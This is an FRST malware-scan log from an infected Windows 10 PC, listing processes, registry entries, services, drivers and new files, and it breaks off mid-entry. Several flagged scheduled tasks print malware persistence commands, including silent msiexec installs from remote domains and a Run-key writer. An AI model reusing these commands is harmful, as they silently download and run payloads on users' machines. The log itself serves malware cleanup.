Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-06-2019 Ran by Bach (administrator) on BACH (Micro-Star International Co., Ltd. MS-7A37) (24-06-2019 02:56:31) Running from E:\ Loaded Profiles: Bach (Available Profiles: Bach) Platform: Windows 10 Pro Version 1809 17763.557 (X64) Language: Türkçe (Türkiye) Default browser: Edge Boot Mode: Safe Mode (minimal) Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) () [File not signed] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\HelpPane.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\browser_broker.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeSH.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9269352 2019-01-10] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2849872 2019-05-04] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [700328 2017-01-06] (Autodesk, Inc -> Autodesk, Inc.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-3359497532-2870962415-192448273-1001\...\Run: [MKey] => C:\Program Files (x86)\MKey\MKey.exe HKU\S-1-5-21-3359497532-2870962415-192448273-1001\...\RunOnce: [Application Restart #0] => C:\Windows\HelpPane.exe [1065472 2018-09-15] (Microsoft Windows -> Microsoft Corporation) HKU\S-1-5-21-3359497532-2870962415-192448273-1001\...\Policies\Explorer: [NoSecurityTab] 1 HKU\S-1-5-21-3359497532-2870962415-192448273-1001\...\MountPoints2: {5b555556-1d8a-11e9-a496-309c2303ec2c} - "F:\HiSuiteDownLoader.exe" BootExecute: autocheck autochk * sh4native Sh4Removal CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {00D23E8A-F144-4CE6-BDB7-80F63BF5C2CB} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2208896 2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Task: {0B19D664-C48C-4E5F-B352-E342E1595B5D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe [470952 2019-02-23] (Microsoft Corporation -> Microsoft Corporation) Task: {0B35F462-0728-4008-8C68-328B2C3AC293} - System32\Tasks\{8DE6413A-791B-BB82-7CD0-8D14BCCB8E0F} => C:\Users\Bach\AppData\Local\ONUNgrImIAlyO.exe [78336 1601-01-03] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION Task: {2C9A89C3-0C75-4B14-B173-BD395BDB8299} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [57736 2018-12-06] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {302A995D-947B-4B4F-8FA0-6F57A88B8C22} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [468992 2018-12-07] (Advanced Micro Devices, Inc.) [File not signed] Task: {33EF3D90-78E8-4F02-AFCA-EC3A0F9ECA81} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2208896 2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Task: {3805B970-0082-4AEF-AE05-19F2B09569EB} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe [470952 2019-02-23] (Microsoft Corporation -> Microsoft Corporation) Task: {4928CD80-BF1D-4511-B08E-F16311678E9B} - System32\Tasks\AdobeGCInvoker-1.0-BACH-Bach => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2849872 2019-05-04] (Adobe Inc. -> Adobe Systems, Incorporated) Task: {4C8755D3-56B1-4EE5-98A9-D308157DE73C} - System32\Tasks\Bach => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Bach /t REG_SZ /d "cmd.exe /c start www.dinoraptzor.org" Task: {50BCD74A-D028-4E4B-8692-0209717FD26A} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [468992 2018-12-07] (Advanced Micro Devices, Inc.) [File not signed] Task: {5CF1F21C-B7C5-4083-892F-2FD92F3F5458} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26167288 2019-06-07] (Microsoft Corporation -> Microsoft Corporation) Task: {75404A48-8B82-490E-B116-190FBF7AC0B0} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2238496 2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Task: {7DC2A686-29E8-4A76-87D1-0EFCD391153E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {8B820864-4F6A-4781-BD40-C8FA8C5FDA37} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe Task: {8BFF1537-1429-476A-A101-254B8ED52C1F} - System32\Tasks\kwxauglawhl => "msiexec" /q -package hxxps://superdomain1709.info/eiaiinmxs.mci <==== ATTENTION Task: {8C1B4B45-519F-4735-93C6-07174C8C5D10} - System32\Tasks\SpyHunter4Startup => D:\Download\Torrent\Spy Hunter 4.2 Final+Portable\SpyHunter-PORTABLE\App\SpyHunter\SpyHunter4.exe Task: {A19AF816-8960-4E1A-8183-94903FD01DEC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe [470952 2019-02-23] (Microsoft Corporation -> Microsoft Corporation) Task: {AAD885DA-ADD1-45D0-91F1-C68E6B2006CE} - System32\Tasks\{F3E5952C-99EA-D139-E06D-BC21E2C3A52D} => "msiexec.exe" /i hxxps://refreshnerer711rb.info/RI3OYsMW.NOZ /q <==== ATTENTION Task: {AEB7FFFB-9560-4954-9CC2-098719EA92DE} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\sdxhelper.exe [149528 2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Task: {B3BAB548-F8DA-44F6-8F71-F60D2CC731DD} - System32\Tasks\nugeaoyo => "msiexec" -package hxxps://superdomain1709.info/owoucbg.mha /q <==== ATTENTION Task: {BDADE607-C3C5-43E5-B4E7-57C502244F67} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {D706164D-4395-4EC6-9F56-1BAE13CCBEB1} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26167288 2019-06-07] (Microsoft Corporation -> Microsoft Corporation) Task: {DF9542F3-23E9-4B2E-9CE2-4E356832B18B} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\sdxhelper.exe [149528 2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Task: {FA58C899-690A-4760-A0BE-64E966ED0441} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MpCmdRun.exe [470952 2019-02-23] (Microsoft Corporation -> Microsoft Corporation) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt Tcpip\Parameters: [DhcpNameServer] 46.197.15.60 178.233.140.110 176.240.150.250 Tcpip\..\Interfaces\{7d115b1b-3b6d-42ce-ad81-85e6c2f05db5}: [DhcpNameServer] 46.197.15.60 178.233.140.110 176.240.150.250 Tcpip\..\Interfaces\{b21e7f76-de77-4a2f-9364-5245b5a87ecb}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{b21e7f76-de77-4a2f-9364-5245b5a87ecb}: [DhcpNameServer] 46.197.15.60 178.233.140.110 176.240.150.250 Tcpip\..\Interfaces\{f451b34e-ae5e-46c4-bedf-dab73667b7f4}: [DhcpNameServer] 46.197.15.60 178.233.140.110 176.240.150.250 Internet Explorer: ================== HKU\S-1-5-21-3359497532-2870962415-192448273-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.msn.com/?PC=UF01 SearchScopes: HKU\S-1-5-21-3359497532-2870962415-192448273-1001 -> DefaultScope {8C3078A0-9AAB-4371-85D1-656CA8E46EE8} URL = hxxps://yandex.com.tr/search/?text={searchTerms}&clid=2233630 SearchScopes: HKU\S-1-5-21-3359497532-2870962415-192448273-1001 -> {8C3078A0-9AAB-4371-85D1-656CA8E46EE8} URL = hxxps://yandex.com.tr/search/?text={searchTerms}&clid=2233630 BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2019-04-06] (Microsoft Corporation -> Microsoft Corporation) Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-03] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-03] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-03] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-03] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-06-18] (Microsoft Corporation -> Microsoft Corporation) Edge: ====== Edge HomeButtonPage: HKU\S-1-5-21-3359497532-2870962415-192448273-1001 -> hxxp://www.google.com/ FireFox: ======== FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-06-03] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2019-04-06] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-01-10] (Google Inc -> Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-01-10] (Google Inc -> Google Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems Incorporated -> Adobe Systems) Chrome: ======= CHR Profile: C:\Users\Bach\AppData\Local\Google\Chrome\User Data\Default [2019-06-24] CHR Extension: (Chrome Web Store Payments) - C:\Users\Bach\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-01-10] CHR Extension: (Chrome Media Router) - C:\Users\Bach\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16] CHR HKU\S-1-5-21-3359497532-2870962415-192448273-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gndoicapfdaldiokbcdnllfhnapokcbk] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-3359497532-2870962415-192448273-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ikpcpgklmefncbfgbdifkaphbaapgafh] - hxxps://clients2.google.com/service/update2/crx ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1290744 2017-01-06] (Autodesk, Inc -> Autodesk Inc.) S2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated) S2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3117648 2019-05-04] (Adobe Inc. -> Adobe Systems, Incorporated) S2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2888272 2019-05-04] (Adobe Inc. -> Adobe Systems, Incorporated) S2 AMD External Events Utility; C:\Windows\System32\DriverStore\FileRepository\c0337011.inf_amd64_feebf3217f6c2f34\B336523\atiesrxx.exe [516720 2018-12-13] (Advanced Micro Devices, Inc. -> AMD) S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11146224 2019-06-06] (Microsoft Corporation -> Microsoft Corporation) S2 McNeelUpdate; C:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [65904 2017-08-22] (Robert McNeel and Associates -> Robert McNeel & Associates) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5382448 2019-04-10] (Microsoft Windows Publisher -> Microsoft Corporation) S2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11814232 2019-06-05] (TeamViewer GmbH -> TeamViewer GmbH) S2 VRLService; C:\Program Files\Chaos Group\VRLService\OLS/vrol.exe [6520832 2019-01-12] (Chaos Software Ltd.) [File not signed] S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\NisSrv.exe [4098064 2019-02-23] (Microsoft Corporation -> Microsoft Corporation) S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1902.2-0\MsMpEng.exe [113992 2019-02-23] (Microsoft Corporation -> Microsoft Corporation) S2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [2258888 2018-12-19] (Wacom Technology Corporation -> Wacom Technology, Corp.) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 amdgpio2; C:\Windows\System32\drivers\amdgpio2.sys [34568 2019-04-17] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc) R3 amdgpio3; C:\Windows\System32\drivers\amdgpio3.sys [24424 2016-08-12] (AMD PMP-PE CB Code Signer v20160415 -> Advanced Micro Devices, Inc) R0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [75584 2018-12-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) S3 amdkmcsp; C:\Windows\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. ) S3 amdkmdag; C:\Windows\System32\DriverStore\FileRepository\c0337011.inf_amd64_feebf3217f6c2f34\B336523\atikmdag.sys [52757104 2018-12-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) S3 amdkmdap; C:\Windows\System32\DriverStore\FileRepository\c0337011.inf_amd64_feebf3217f6c2f34\B336523\atikmpag.sys [598640 2018-12-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [102192 2019-01-10] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) R3 AMDPCIDev; C:\Windows\System32\drivers\AMDPCIDev.sys [31592 2018-04-25] (Advanced Micro Devices Inc. -> Advanced Micro Devices) R0 amdpsp; C:\Windows\System32\DRIVERS\amdpsp.sys [243048 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. ) S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.) S3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [107400 2018-10-03] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices) S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131904 2018-12-12] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S1 epp; C:\EEK\bin64\epp.sys [142952 2019-06-23] (Emsisoft Ltd -> Emsisoft Ltd) S3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [1122200 2019-01-10] (Realtek Semiconductor Corp. -> Realtek ) S3 RtlWlanu; C:\Windows\System32\drivers\rtwlanu.sys [8206848 2018-09-15] (Microsoft Windows -> Realtek Semiconductor Corporation ) S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [167232 2018-12-12] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S3 WacHidRouterPro; C:\Windows\System32\drivers\wachidrouter.sys [115608 2018-12-19] (Microsoft Windows Hardware Compatibility Publisher -> Wacom Technology, Corp.) S3 wacomrouterfilter; C:\Windows\System32\drivers\wacomrouterfilter.sys [17816 2018-12-19] (Microsoft Windows Hardware Compatibility Publisher -> Wacom Technology, Corp.) S3 WdBoot; C:\Windows\system32\drivers\wd\WdBoot.sys [46472 2019-02-23] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\Windows\system32\drivers\wd\WdFilter.sys [333792 2019-02-23] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [62432 2019-02-23] (Microsoft Windows -> Microsoft Corporation) S1 ZAM; \??\C:\Windows\System32\drivers\zam64.sys [X] S1 ZAM_Guard; \??\C:\Windows\System32\drivers\zamguard64.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-06-24 01:46 - 2019-06-24 02:41 - 000075088 _____ C:\Windows\ZAM.krnl.trace 2019-06-24 01:46 - 2019-06-24 02:41 - 000031995 _____ C:\Windows\ZAM_Guard.krnl.trace 2019-06-24 01:45 - 2019-06-24 02:49 - 000000000 ____D C:\Program Files (x86)\Zemana AntiMalware 2019-06-24 01:44 - 2019-06-24 01:44 - 000000000 ____D C:\Users\Bach\AppData\Local\Zemana 2019-06-24 01:17 - 2019-06-24 01:25 - 000003196 _____ C:\Users\Bach\Desktop\Rkill.txt 2019-06-24 01:02 - 2019-06-24 01:12 - 000000000 ____D C:\EEK 2019-06-24 00:42 - 2019-06-24 00:42 - 000000000 ____D C:\ProgramData\Emsisoft 2019-06-24 00:17 - 2019-06-24 01:29 - 000000000 ____D C:\Users\Bach\AppData\Roaming\eqmg44ixhva 2019-06-24 00:07 - 2019-06-24 00:07 - 046683168 _____ (Microsoft Corporation) C:\Users\Bach\Downloads\Windows-KB890830-x64-V5.73.exe 2019-06-23 23:41 - 2019-06-23 23:41 - 000000000 ___HD C:\hpoZ5N76XJE3bZkj 2019-06-23 23:21 - 2019-06-23 23:41 - 000003396 _____ C:\Windows\System32\Tasks\SpyHunter4Startup 2019-06-23 23:21 - 2019-06-23 22:51 - 000025984 _____ C:\Windows\SysWOW64\sh4native.exe 2019-06-23 23:20 - 2019-06-23 23:20 - 000000000 ___HD C:\wwAEKpLvQKYD6J2q 2019-06-23 22:53 - 2019-06-24 01:29 - 000000000 ____D C:\Users\Bach\AppData\Roaming\n13oy1sw5ur 2019-06-23 22:53 - 2019-06-23 22:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Throttle 2019-06-23 22:53 - 2019-06-23 22:53 - 000000000 ____D C:\Program Files (x86)\PGWARE 2019-06-23 22:39 - 2019-06-23 22:39 - 006822192 _____ (EnigmaSoft Limited) C:\Users\Bach\Downloads\SpyHunter-Installer.exe 2019-06-23 22:36 - 2019-06-23 22:36 - 000000422 _____ C:\Users\Bach\Downloads\Delete_Update_Policies.zip 2019-06-23 19:36 - 2017-09-18 20:21 - 010640216 _____ C:\Users\Bach\Desktop\hasss.mp4 2019-06-22 19:48 - 2019-06-22 19:48 - 000198270 _____ C:\Users\Bach\Desktop\ortalama hesap narsis wall.skp 2019-06-22 18:13 - 2019-06-22 19:51 - 027841037 _____ C:\Users\Bach\Desktop\39 narcissus wall.ls8 2019-06-22 18:09 - 2019-06-22 18:13 - 007872877 _____ C:\Users\Bach\Desktop\39 narciss.mp4 2019-06-22 17:45 - 2019-06-22 18:05 - 010852659 _____ C:\Users\Bach\Desktop\narcissus wall 39.mp4 2019-06-22 17:31 - 2019-06-22 17:28 - 000140547 _____ C:\Users\Bach\Desktop\39 için duvar.skb 2019-06-22 17:17 - 2019-06-22 17:31 - 000141036 _____ C:\Users\Bach\Desktop\39 için duvar.skp 2019-06-22 17:15 - 2019-06-22 17:15 - 040669154 _____ C:\Users\Bach\Desktop\39 satalite.obj 2019-06-21 18:58 - 2019-06-24 01:29 - 000000000 ____D C:\Users\Bach\AppData\Roaming\2leyfcbhdnx 2019-06-21 18:58 - 2019-06-24 00:25 - 000000000 __SHD C:\ProgramData\{77251327-7725-7725-772513271001} 2019-06-21 18:58 - 2019-06-21 18:58 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll 2019-06-21 18:58 - 2019-06-21 18:58 - 000825856 _____ C:\Default.xml 2019-06-21 18:58 - 2019-06-21 18:58 - 000722944 _____ C:\Users\Bach\AppData\Local\sha.db 2019-06-21 18:58 - 2019-06-21 18:58 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll 2019-06-21 18:58 - 2019-06-21 18:58 - 000000000 ____D C:\Users\Bach\AppData\Local\Microsoft Vision 2019-06-21 18:58 - 2019-06-21 18:58 - 000000000 ____D C:\ProgramData\AGSFFTGNCO9G8EWXWU60Z0L5I 2019-06-21 18:58 - 2019-06-21 18:58 - 000000000 ____D C:\Program Files\Microsoft DN1 2019-06-21 18:57 - 2019-06-24 00:25 - 000000000 ____D C:\Program Files (x86)\gujhd 2019-06-21 18:57 - 2019-06-21 18:57 - 000000000 ____D C:\ProgramData\{7620F281-7674-8B9A-0C6B-19070C8C4056} 2019-06-21 18:57 - 2019-06-21 18:57 - 000000000 ____D C:\ProgramData\{1115B979-3D8C-ECAF-F420-2C60F4C77531} 2019-06-21 18:56 - 2019-06-24 00:25 - 000000000 ____D C:\Users\Bach\AppData\Local\App 2019-06-21 18:10 - 2019-06-21 18:14 - 005558103 _____ C:\Users\Bach\Desktop\narcissus wall nicel.mp4 2019-06-21 18:04 - 2019-06-21 18:09 - 006672062 _____ C:\Users\Bach\Desktop\narcissus wall goold.mp4 2019-06-21 17:54 - 2019-06-22 18:14 - 006197367 _____ C:\Users\Bach\Desktop\satalaite.3dm 2019-06-21 17:54 - 2019-06-21 17:54 - 037562319 _____ C:\Users\Bach\Desktop\satalaite.3dmbak 2019-06-21 17:46 - 2019-06-21 17:53 - 004378204 _____ C:\Users\Bach\Desktop\narcissus wall.mp4 2019-06-21 17:29 - 2019-06-21 17:35 - 155022106 _____ C:\Users\Bach\Desktop\wallwallll.obj 2019-06-21 15:59 - 2019-06-21 15:59 - 000693083 _____ C:\Users\Bach\Desktop\the wall.dwg 2019-06-21 13:59 - 2019-06-21 17:05 - 016368828 _____ C:\Users\Bach\Desktop\the wall.skp 2019-06-21 13:47 - 2019-06-21 13:47 - 071181993 _____ C:\Users\Bach\Desktop\the wall.skpbak 2019-06-21 04:40 - 2019-06-21 04:40 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsignb32d314421e720d1 2019-06-21 01:01 - 2019-06-21 01:01 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign6086c06f6bc4c40f 2019-06-21 01:01 - 2019-06-21 01:01 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign60794c1e462001ce 2019-06-21 00:38 - 2019-06-21 00:38 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsigne5a83f2e10cd9767 2019-06-20 23:55 - 2019-06-20 23:55 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsignb4b5a5661cb4e403 2019-06-20 23:55 - 2019-06-20 23:55 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign903cbfe13d035a56 2019-06-20 23:55 - 2019-06-20 23:55 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign2d6794baf39e71f3 2019-06-20 23:55 - 2019-06-20 23:55 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign1516f181057f3fae 2019-06-19 18:21 - 2019-06-19 18:21 - 003793833 _____ C:\Users\Bach\Desktop\SON.bip 2019-06-18 18:49 - 2019-06-18 18:49 - 000000000 ____D C:\Users\Bach\Documents\My Games 2019-06-18 18:49 - 2019-06-18 18:49 - 000000000 ____D C:\Users\Bach\Documents\CPY_SAVES 2019-06-18 18:02 - 2019-06-18 18:02 - 000000000 ____D C:\Program Files\UNP 2019-06-18 18:01 - 2019-06-18 18:01 - 001925285 _____ C:\Users\Bach\Desktop\last basalt.gcode 2019-06-16 16:33 - 2019-06-16 16:33 - 000000855 _____ C:\Users\Bach\Far Cry 5.lnk 2019-06-16 16:33 - 2019-06-16 16:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Far Cry 5 2019-06-16 16:19 - 2019-06-16 16:19 - 000003510 _____ C:\Windows\System32\Tasks\Bach 2019-06-16 14:37 - 2019-06-16 14:37 - 000000000 ____D C:\Users\Bach\AppData\Local\UnrealEngine 2019-06-16 14:37 - 2019-06-16 14:37 - 000000000 ____D C:\Users\Bach\AppData\Local\HelloNeighbor 2019-06-16 14:21 - 2019-06-16 14:21 - 013826343 _____ C:\Users\Bach\Desktop\render dene.3dm 2019-06-15 16:12 - 2019-06-15 16:12 - 000000000 ____D C:\Windows\SysWOW64\XPSViewer 2019-06-15 16:12 - 2019-06-15 16:12 - 000000000 ____D C:\Program Files\Reference Assemblies 2019-06-15 16:12 - 2019-06-15 16:12 - 000000000 ____D C:\Program Files\MSBuild 2019-06-15 16:12 - 2019-06-15 16:12 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies 2019-06-15 16:12 - 2019-06-15 16:12 - 000000000 ____D C:\Program Files (x86)\MSBuild 2019-06-15 16:12 - 2018-09-09 17:17 - 001167960 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll 2019-06-15 16:12 - 